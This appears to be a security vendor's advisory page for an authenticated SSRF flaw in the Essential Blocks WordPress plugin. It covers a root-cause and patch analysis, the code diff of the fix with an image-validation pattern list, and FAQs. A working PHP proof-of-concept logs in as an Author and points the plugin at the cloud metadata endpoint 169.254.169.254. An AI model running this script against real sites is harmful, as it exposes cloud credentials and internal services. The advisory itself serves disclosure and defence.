What is CVE-2026-10586?

CVE-2026-10586 is a high-severity authenticated Server-Side Request Forgery (SSRF) vulnerability found in the Gutenberg Essential Blocks plugin for WordPress, affecting versions up to 6.1.3. It allows authenticated users with Author-level access or higher to make arbitrary web requests from the server, potentially exposing sensitive information.

How does the vulnerability work?

The vulnerability exists in the save_ai_generated_image() function, which uses wp_remote_get() to fetch images from user-supplied URLs without proper validation. This allows attackers to send requests to internal services or external sites, leading to potential data leakage or interaction with internal APIs.

Who is affected by this vulnerability?

Any WordPress site using the Gutenberg Essential Blocks plugin version 6.1.3 or earlier is affected. Administrators should check their plugin version and update if they are running an affected version.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Gutenberg Essential Blocks plugin in your WordPress admin dashboard. If it is version 6.1.3 or earlier, your site is vulnerable to this issue.

How can I fix CVE-2026-10586?

The vulnerability is patched in version 6.1.4 of the Gutenberg Essential Blocks plugin. Administrators should update to this version or later to mitigate the risk associated with this vulnerability.

What are the risks associated with this vulnerability?

The risks include unauthorized access to internal services, potential data leakage, and the ability to probe internal networks. Although the requirement for Author-level access limits exposure, compromised Author accounts can still lead to significant security issues.

What does a CVSS score of 7.2 indicate?

A CVSS score of 7.2 indicates a high severity vulnerability. This means that the vulnerability poses a significant risk to affected systems, and immediate action is recommended to remediate the issue.

What is a proof of concept (PoC) for this vulnerability?

The proof of concept for CVE-2026-10586 illustrates how an authenticated attacker can exploit the vulnerability by sending a specially crafted request to the vulnerable endpoint. This PoC shows how an attacker can retrieve sensitive information from internal services using the SSRF attack vector.

How does the patch address the vulnerability?

The patch introduces an ImageValidator class and replaces wp_remote_get() with wp_safe_remote_get(), which blocks requests to unsafe URLs. Additionally, it validates the HTTP response and restricts allowed MIME types, significantly reducing the risk of SSRF.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Gutenberg Essential Blocks plugin until it can be updated. Additionally, review user roles and permissions to limit access to Author-level accounts and monitor for any suspicious activity.

What are internal services and why are they a concern?

Internal services refer to applications or APIs that run within a private network, often containing sensitive data. Exploiting this vulnerability could allow attackers to access these services, leading to data breaches or further exploitation of the network.

What is the significance of the authenticated requirement for this vulnerability?

The requirement for authenticated access means that only users with Author-level privileges or higher can exploit this vulnerability. While this reduces the attack surface, it still poses a risk as compromised accounts can lead to exploitation.

Published : June 14, 2026

CVE-2026-10586: Gutenberg Essential Blocks – Page Builder for Gutenberg Blocks & Patterns <= 6.1.3 Authenticated (Author+) Server-Side Request Forgery PoC, Patch Analysis & Rule

CVE ID CVE-2026-10586

Plugin essential-blocks

Severity High (CVSS 7.2)

CWE 918

Vulnerable Version 6.1.3

Patched Version 6.1.4

Disclosed June 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-10586:
This vulnerability is an authenticated Server-Side Request Forgery (SSRF) in the Gutenberg Essential Blocks plugin for WordPress, affecting all versions up to and including 6.1.3. The flaw exists in the save_ai_generated_image() function within the AI integration module, allowing attackers with Author-level access or higher to make arbitrary web requests from the server. The CVSS score is 7.2, indicating high severity.

Root Cause:
The root cause is twofold. First, in essential-blocks/includes/Integrations/AI/AI.php, the save_ai_generated_image() method (line 168) uses wp_remote_get() to download an image from a user-supplied URL ($image_url). This function does not block requests to internal/private IP ranges, loopback addresses, or link-local networks. Second, the original validation function is_valid_image_content() in Admin.php (lines 1026-1065) only checks the downloaded content for suspicious patterns and size limits after the request has already been made. It does not validate the URL itself or restrict where the request can go. An attacker can pass any URL, including internal services like 169.254.169.254 (cloud metadata) or 127.0.0.1:8080 (local admin panels), and the server will connect to it.

Exploitation:
To exploit this, an attacker must be logged in with at least Author-level privileges. The vulnerable endpoint is the WordPress AJAX action hook ‘eb_save_ai_generated_image’. An attacker sends a POST request to /wp-admin/admin-ajax.php with the action parameter set to ‘eb_save_ai_generated_image’ and includes an image_url parameter pointing to an internal service. For example, image_url=http://169.254.169.254/latest/meta-data/ to fetch cloud instance metadata, or image_url=http://127.0.0.1/wp-admin/admin-ajax.php to probe local services. The server will execute the request and return the response content as if it were an image, potentially leaking sensitive data.

Patch Analysis:
The patch introduces a dedicated ImageValidator class in essential-blocks/includes/Utils/ImageValidator.php that centralizes image validation. More critically, it replaces wp_remote_get() with wp_safe_remote_get() in two locations: the save_ai_generated_image() method (AI.php line 171) and the get_remote_image_data() method in OpenAI.php (line 1132). The wp_safe_remote_get() function enforces the ‘reject_unsafe_urls’ flag, which blocks requests to private IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), loopback (127.0.0.0/8), and link-local (169.254.0.0/16) addresses. Additionally, the patch validates the HTTP response code (must be 200) and restricts allowed MIME types to JPEG, PNG, WebP, and GIF only. The validation now occurs before processing, but the key fix is the safe remote request function.

Impact:
Successful exploitation allows an attacker to perform SSRF attacks against internal networks, cloud metadata services, and other services running on the server or within its private network. This can lead to information disclosure (e.g., AWS keys from cloud metadata, internal service configurations), port scanning of internal hosts, and potential interaction with internal APIs that may allow further compromise. The authenticated requirement reduces the attack surface to logged-in users with Author roles, but in many WordPress installations, Author users exist and can be compromised or registered.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/essential-blocks/assets/admin/dashboard/admin.asset.php
+++ b/essential-blocks/assets/admin/dashboard/admin.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-api-fetch', 'wp-components', 'wp-data', 'wp-element', 'wp-hooks', 'wp-i18n'), 'version' => '6a348a6092b868d7a0a5');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-api-fetch', 'wp-components', 'wp-data', 'wp-element', 'wp-hooks', 'wp-i18n'), 'version' => '6d916f9c44e307dbc5a0');
--- a/essential-blocks/assets/admin/editor/editor.asset.php
+++ b/essential-blocks/assets/admin/editor/editor.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'wp-api-fetch', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-dom', 'wp-element', 'wp-escape-html', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keycodes', 'wp-notices', 'wp-polyfill', 'wp-primitives', 'wp-server-side-render'), 'version' => 'eaca3b5ba6a1ca56faad');
+<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'wp-api-fetch', 'wp-blob', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-dom', 'wp-element', 'wp-escape-html', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keycodes', 'wp-notices', 'wp-polyfill', 'wp-primitives', 'wp-server-side-render'), 'version' => '10e7c115352babb297e7');
--- a/essential-blocks/assets/blocks/google-map/frontend.asset.php
+++ b/essential-blocks/assets/blocks/google-map/frontend.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('wp-i18n'), 'version' => '040f44cdeaf70f575c59');
+<?php return array('dependencies' => array('wp-i18n'), 'version' => '21f45caa9edbdfc3e1bf');
--- a/essential-blocks/assets/vendors/js/bundles.asset.php
+++ b/essential-blocks/assets/vendors/js/bundles.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => 'ef1ffa71b48110215b1b');
+<?php return array('dependencies' => array(), 'version' => 'af41824f51ec6698b729');
--- a/essential-blocks/essential-blocks.php
+++ b/essential-blocks/essential-blocks.php
@@ -6,7 +6,7 @@
  * Description: The Ultimate Gutenberg blocks library to create WordPress sites in the Gutenberg Block Editor with 70+ essential blocks, patterns, templates for WooCommerce, posts, & more.
  * Author: WPDeveloper
  * Author URI: https://wpdeveloper.com
- * Version: 6.1.3
+ * Version: 6.1.4
  * License: GPL3+
  * License URI: http://www.gnu.org/licenses/gpl-3.0.txt
  * Text Domain: essential-blocks
--- a/essential-blocks/includes/API/Product.php
+++ b/essential-blocks/includes/API/Product.php
@@ -262,7 +262,7 @@
                     $query_args[ 'orderby' ]  = 'meta_value_num';
                     $query_args[ 'order' ]    = 'desc';
                     break;
-                case 'rating';
+                case 'rating':
                     $query_args[ 'meta_key' ] = '_wc_average_rating';
                     $query_args[ 'orderby' ]  = 'meta_value_num';
                     break;
--- a/essential-blocks/includes/Admin/Admin.php
+++ b/essential-blocks/includes/Admin/Admin.php
@@ -4,6 +4,7 @@

 use PriyoMukulWPNoticeNotices;
 use EssentialBlocksUtilsHelper;
+use EssentialBlocksUtilsImageValidator;
 use EssentialBlocksUtilsSettings;
 use PriyoMukulWPNoticeUtilsCacheBank;
 use EssentialBlocksTraitsHasSingletone;
@@ -906,7 +907,7 @@
             }

             // Security: Validate image content and size
-            if ( ! $this->is_valid_image_content( $image_body ) ) {
+            if ( ! ImageValidator::is_valid( $image_body ) ) {
                 wp_send_json_error( array(
                     'message' => __( 'Invalid image content provided.', 'essential-blocks' )
                 ) );
@@ -1012,57 +1013,6 @@
     }

     /**
-     * Validate image content for security
-     *
-     * @param string $image_data The image data to validate
-     * @return bool True if valid, false otherwise
-     */
-    private function is_valid_image_content( $image_data ) {
-        if ( empty( $image_data ) ) {
-            return false;
-        }
-
-        // Check file size (max 10MB)
-        $max_size = 10 * 1024 * 1024; // 10MB
-        if ( strlen( $image_data ) > $max_size ) {
-            return false;
-        }
-
-        // Validate image using getimagesizefromstring
-        $image_info = getimagesizefromstring( $image_data );
-        if ( ! $image_info ) {
-            return false;
-        }
-
-        // Check image dimensions (reasonable limits)
-        $max_width  = 4096;
-        $max_height = 4096;
-        if ( $image_info[ 0 ] > $max_width || $image_info[ 1 ] > $max_height ) {
-            return false;
-        }
-
-        // Additional security: Check for suspicious content patterns
-        // Look for common file signatures that shouldn't be in images
-        $suspicious_patterns = array(
-            '<?php', // PHP code
-            '<script', // JavaScript
-            'javascript:', // JavaScript protocol
-            'data:text/', // Text data URLs
-            '<html', // HTML content
-            '#!/bin/' // Shell scripts
-        );
-
-        $data_start = substr( $image_data, 0, 1024 ); // Check first 1KB
-        foreach ( $suspicious_patterns as $pattern ) {
-            if ( stripos( $data_start, $pattern ) !== false ) {
-                return false;
-            }
-        }
-
-        return true;
-    }
-
-    /**
      * update menu notice flag
      */
     public function eb_show_admin_menu_notice() {
--- a/essential-blocks/includes/Blocks/GoogleMap.php
+++ b/essential-blocks/includes/Blocks/GoogleMap.php
@@ -60,7 +60,7 @@
             if ( is_admin() ) {
                 $this->assets_manager->enqueue(
                     'google-map-script-editor',
-                    'https://maps.googleapis.com/maps/api/js?key=' . $this->api_key . '&callback=Function.prototype&libraries=places&cache=' . wp_rand( 10, 1000 ),
+                    'https://maps.googleapis.com/maps/api/js?key=' . $this->api_key . '&callback=Function.prototype&libraries=places,marker&cache=' . wp_rand( 10, 1000 ),
                     [  ],
                     [
                         'is_js' => true
@@ -70,7 +70,7 @@
             // For frontend
             $this->assets_manager->register(
                 'google-map-script',
-                'https://maps.googleapis.com/maps/api/js?key=' . $this->api_key . '&callback=Function.prototype&libraries=places&cache=' . wp_rand( 10, 1000 ),
+                'https://maps.googleapis.com/maps/api/js?key=' . $this->api_key . '&callback=Function.prototype&libraries=places,marker&cache=' . wp_rand( 10, 1000 ),
                 [  ],
                 [
                     'is_js' => true
--- a/essential-blocks/includes/Blocks/PostCarousel.php
+++ b/essential-blocks/includes/Blocks/PostCarousel.php
@@ -79,7 +79,7 @@
             return;
         }

-        $queryData = $attributes[ 'queryData' ];
+        $queryData = isset( $attributes[ 'queryData' ] ) ? $attributes[ 'queryData' ] : [];

         $attributes = wp_parse_args( $attributes, $this->get_default_attributes() );

@@ -136,6 +136,7 @@
             array_merge(
                 $attributes,
                 [
+                    'queryData'      => $queryData,
                     'essentialAttr'  => $_essential_attrs,
                     'sliderSettings' => $_slider_settings,
                     'classHook'      => $classHook,
--- a/essential-blocks/includes/Integrations/AI/AI.php
+++ b/essential-blocks/includes/Integrations/AI/AI.php
@@ -3,6 +3,7 @@
 namespace EssentialBlocksIntegrationsAI;

 use EssentialBlocksIntegrationsThirdPartyIntegration;
+use EssentialBlocksUtilsImageValidator;
 use EssentialBlocksUtilsSettings;

 /**
@@ -167,9 +168,14 @@

             // Handle URL format
             if ( $image_url ) {
-                // Download the image from OpenAI URL
-                $image_data = wp_remote_get( $image_url, [
-                    'timeout' => 60
+                // Download the image using the safe variant (blocks private/loopback/link-local IPs)
+                $image_data = wp_safe_remote_get( $image_url, [
+                    'timeout'     => 60,
+                    'redirection' => 3,
+                    'user-agent'  => 'Essential Blocks/' . ESSENTIAL_BLOCKS_VERSION,
+                    'headers'     => [
+                        'Accept' => 'image/*'
+                     ]
                  ] );

                 if ( is_wp_error( $image_data ) ) {
@@ -179,6 +185,14 @@
                     return;
                 }

+                $response_code = wp_remote_retrieve_response_code( $image_data );
+                if ( 200 !== $response_code ) {
+                    wp_send_json_error( [
+                        'message' => __( 'Invalid response from image URL.', 'essential-blocks' )
+                     ] );
+                    return;
+                }
+
                 $image_body = wp_remote_retrieve_body( $image_data );
             }
             // Handle base64 format
@@ -201,9 +215,39 @@
                 return;
             }

+            // Security: validate image content (size, dimensions, suspicious payloads)
+            if ( ! ImageValidator::is_valid( $image_body ) ) {
+                wp_send_json_error( [
+                    'message' => __( 'Invalid image content provided.', 'essential-blocks' )
+                 ] );
+                return;
+            }
+
             // Detect image format and set appropriate extension and MIME type
             $image_info = getimagesizefromstring( $image_body );
-            $mime_type  = $image_info ? $image_info[ 'mime' ] : 'image/png';
+            if ( ! $image_info ) {
+                wp_send_json_error( [
+                    'message' => __( 'Unable to determine image format.', 'essential-blocks' )
+                 ] );
+                return;
+            }
+
+            $mime_type = $image_info[ 'mime' ];
+
+            // Security: only allow specific image MIME types
+            $allowed_mime_types = [
+                'image/jpeg',
+                'image/png',
+                'image/webp',
+                'image/gif'
+             ];
+
+            if ( ! in_array( $mime_type, $allowed_mime_types, true ) ) {
+                wp_send_json_error( [
+                    'message' => __( 'Unsupported image format.', 'essential-blocks' )
+                 ] );
+                return;
+            }

             // Determine file extension based on MIME type
             $extension = 'png'; // default
@@ -309,4 +353,5 @@
             'data'    => $updated
          ];
     }
+
 }
--- a/essential-blocks/includes/Integrations/AI/OpenAI.php
+++ b/essential-blocks/includes/Integrations/AI/OpenAI.php
@@ -1129,7 +1129,9 @@
      */
     private function get_remote_image_data( $image_url )
     {
-        $response = wp_remote_get( $image_url, [
+        // wp_safe_remote_get sets reject_unsafe_urls, blocking loopback/private/link-local
+        // ranges so an attacker-supplied reference_image_url cannot probe internal hosts.
+        $response = wp_safe_remote_get( $image_url, [
             'timeout'    => 30,
             'user-agent' => 'Essential Blocks Image Converter'
          ] );
--- a/essential-blocks/includes/Plugin.php
+++ b/essential-blocks/includes/Plugin.php
@@ -35,7 +35,7 @@

 final class Plugin {
     use HasSingletone;
-                                        public $version = '6.1.3';
+                                            public $version = '6.1.4';

     public $admin;
     /**
--- a/essential-blocks/includes/Utils/ImageValidator.php
+++ b/essential-blocks/includes/Utils/ImageValidator.php
@@ -0,0 +1,76 @@
+<?php
+
+namespace EssentialBlocksUtils;
+
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+
+/**
+ * Image content validator.
+ *
+ * Shared helper used by AI image-save flows to reject oversized images,
+ * unreasonable dimensions, and payloads that look like embedded scripts
+ * or markup rather than image bytes.
+ */
+class ImageValidator
+{
+    /**
+     * Maximum allowed image byte length (10 MB).
+     */
+    const MAX_SIZE = 10485760;
+
+    /**
+     * Maximum allowed pixel width.
+     */
+    const MAX_WIDTH = 4096;
+
+    /**
+     * Maximum allowed pixel height.
+     */
+    const MAX_HEIGHT = 4096;
+
+    /**
+     * Validate that a binary string looks like a safe image.
+     *
+     * @param string $image_data Raw image bytes.
+     * @return bool
+     */
+    public static function is_valid( $image_data )
+    {
+        if ( empty( $image_data ) ) {
+            return false;
+        }
+
+        if ( strlen( $image_data ) > self::MAX_SIZE ) {
+            return false;
+        }
+
+        $image_info = getimagesizefromstring( $image_data );
+        if ( ! $image_info ) {
+            return false;
+        }
+
+        if ( $image_info[ 0 ] > self::MAX_WIDTH || $image_info[ 1 ] > self::MAX_HEIGHT ) {
+            return false;
+        }
+
+        $suspicious_patterns = [
+            '<?php',
+            '<script',
+            'javascript:',
+            'data:text/',
+            '<html',
+            '#!/bin/'
+         ];
+
+        $data_start = substr( $image_data, 0, 1024 );
+        foreach ( $suspicious_patterns as $pattern ) {
+            if ( stripos( $data_start, $pattern ) !== false ) {
+                return false;
+            }
+        }
+
+        return true;
+    }
+}
--- a/essential-blocks/includes/Utils/QueryHelper.php
+++ b/essential-blocks/includes/Utils/QueryHelper.php
@@ -13,9 +13,22 @@
      */
     public static function get_posts( $queryData, $isAjax = false )
     {
+        // Default every key this method reads. Callers (PostGrid /
+        // PostCarousel) may hand us an empty array when the block has no
+        // saved `queryData` attribute; without these guards each access
+        // below raises a PHP 8.x undefined-index notice (5 per block,
+        // cascading on WP 7.0).
+        $queryData = is_array( $queryData ) ? $queryData : [];

-        $queryData[ 'source' ]  = $queryData[ 'source' ] === 'posts' ? 'post' : $queryData[ 'source' ];
-        $queryData[ 'orderby' ] = $queryData[ 'orderby' ] === 'id' ? 'ID' : $queryData[ 'orderby' ];
+        $queryData[ 'source' ]   = isset( $queryData[ 'source' ] )
+            ? ( $queryData[ 'source' ] === 'posts' ? 'post' : $queryData[ 'source' ] )
+            : 'post';
+        $queryData[ 'orderby' ]  = isset( $queryData[ 'orderby' ] )
+            ? ( $queryData[ 'orderby' ] === 'id' ? 'ID' : $queryData[ 'orderby' ] )
+            : 'date';
+        $queryData[ 'per_page' ] = isset( $queryData[ 'per_page' ] ) ? (int) $queryData[ 'per_page' ] : 10;
+        $queryData[ 'order' ]    = isset( $queryData[ 'order' ] )  ? $queryData[ 'order' ]  : 'desc';
+        $queryData[ 'offset' ]   = isset( $queryData[ 'offset' ] ) ? $queryData[ 'offset' ] : 0;

         // Set Orderby to Default if Pro Orderby is selected and Pro isn't active
         $proOrderby = [ 'rand', 'menu_order', 'comment_count' ];
--- a/essential-blocks/views/product-images.php
+++ b/essential-blocks/views/product-images.php
@@ -5,6 +5,16 @@

     if(! $product ) return;

+    // These come from the merged attribute array via Helper::views();
+    // guard them so a missing attribute does not raise a PHP 8.x
+    // "undefined variable" warning on WP 7.0.
+    $blockId         = isset( $blockId ) ? $blockId : '';
+    $classHook       = isset( $classHook ) ? $classHook : '';
+    $enableZoom      = isset( $enableZoom ) ? $enableZoom : false;
+    $galleryPosition = isset( $galleryPosition ) ? $galleryPosition : 'bottom';
+    $settings        = isset( $settings ) ? $settings : [];
+    $nav_settings    = isset( $nav_settings ) ? $nav_settings : [];
+
     $wrapper_attributes = get_block_wrapper_attributes(
 		[
 			'class' => 'root-' . $blockId,

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-10586 - Gutenberg Essential Blocks Authenticated SSRF

/**
 * Test script for CVE-2026-10586
 * Requires: An attacker with Author-level credentials
 * Attack: SSRF via image_url parameter
 */

$target_url = 'http://target-wordpress-site.com';  // CHANGE THIS
$username = 'attacker';   // CHANGE THIS
$password = 'password';    // CHANGE THIS
$internal_endpoint = 'http://169.254.169.254/latest/meta-data/';  // AWS metadata endpoint

// Step 1: Login to get cookies
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In&redirect_to=' . urlencode($target_url . '/wp-admin/') . '&testcookie=1');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('Login failed. Check credentials or target URL.n');
}

echo "[+] Login successful.n";

// Step 2: Fetch the nonce for AJAX calls (from wp-admin)
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$response = curl_exec($ch);
curl_close($ch);

// WordPress does not expose nonces in AJAX responses directly, but the plugin may
// Not needed if the AJAX handler doesn't require nonce (many plugin SSRF vulns skip)

// Step 3: Fire the SSRF payload via AJAX
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = [
    'action' => 'eb_save_ai_generated_image',
    'image_url' => $internal_endpoint,
    '_ajax_nonce' => '',  // leave empty; plugin may not check
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] HTTP Response code: $http_coden";
echo "[+] Response body (raw):n$responsen";

if (strpos($response, 'success') !== false || strpos($response, 'attachment_url') !== false) {
    echo "[!] SSRF likely successful. The response may contain internal data.n";
} else {
    echo "[-] SSRF may have been blocked or the plugin version is patched.n";
}

Frequently Asked Questions

What is CVE-2026-10586?
Overview of the vulnerability
CVE-2026-10586 is a high-severity authenticated Server-Side Request Forgery (SSRF) vulnerability found in the Gutenberg Essential Blocks plugin for WordPress, affecting versions up to 6.1.3. It allows authenticated users with Author-level access or higher to make arbitrary web requests from the server, potentially exposing sensitive information.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists in the save_ai_generated_image() function, which uses wp_remote_get() to fetch images from user-supplied URLs without proper validation. This allows attackers to send requests to internal services or external sites, leading to potential data leakage or interaction with internal APIs.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Gutenberg Essential Blocks plugin version 6.1.3 or earlier is affected. Administrators should check their plugin version and update if they are running an affected version.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Gutenberg Essential Blocks plugin in your WordPress admin dashboard. If it is version 6.1.3 or earlier, your site is vulnerable to this issue.
How can I fix CVE-2026-10586?
Updating the plugin
The vulnerability is patched in version 6.1.4 of the Gutenberg Essential Blocks plugin. Administrators should update to this version or later to mitigate the risk associated with this vulnerability.
What are the risks associated with this vulnerability?
Understanding the impact
The risks include unauthorized access to internal services, potential data leakage, and the ability to probe internal networks. Although the requirement for Author-level access limits exposure, compromised Author accounts can still lead to significant security issues.
What does a CVSS score of 7.2 indicate?
Severity assessment
A CVSS score of 7.2 indicates a high severity vulnerability. This means that the vulnerability poses a significant risk to affected systems, and immediate action is recommended to remediate the issue.
What is a proof of concept (PoC) for this vulnerability?
Demonstrating the exploit
The proof of concept for CVE-2026-10586 illustrates how an authenticated attacker can exploit the vulnerability by sending a specially crafted request to the vulnerable endpoint. This PoC shows how an attacker can retrieve sensitive information from internal services using the SSRF attack vector.
How does the patch address the vulnerability?
Details of the fix
The patch introduces an ImageValidator class and replaces wp_remote_get() with wp_safe_remote_get(), which blocks requests to unsafe URLs. Additionally, it validates the HTTP response and restricts allowed MIME types, significantly reducing the risk of SSRF.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the Gutenberg Essential Blocks plugin until it can be updated. Additionally, review user roles and permissions to limit access to Author-level accounts and monitor for any suspicious activity.
What are internal services and why are they a concern?
Understanding internal network risks
Internal services refer to applications or APIs that run within a private network, often containing sensitive data. Exploiting this vulnerability could allow attackers to access these services, leading to data breaches or further exploitation of the network.
What is the significance of the authenticated requirement for this vulnerability?
Access control implications
The requirement for authenticated access means that only users with Author-level privileges or higher can exploit this vulnerability. While this reduces the attack surface, it still poses a risk as compromised accounts can lead to exploitation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations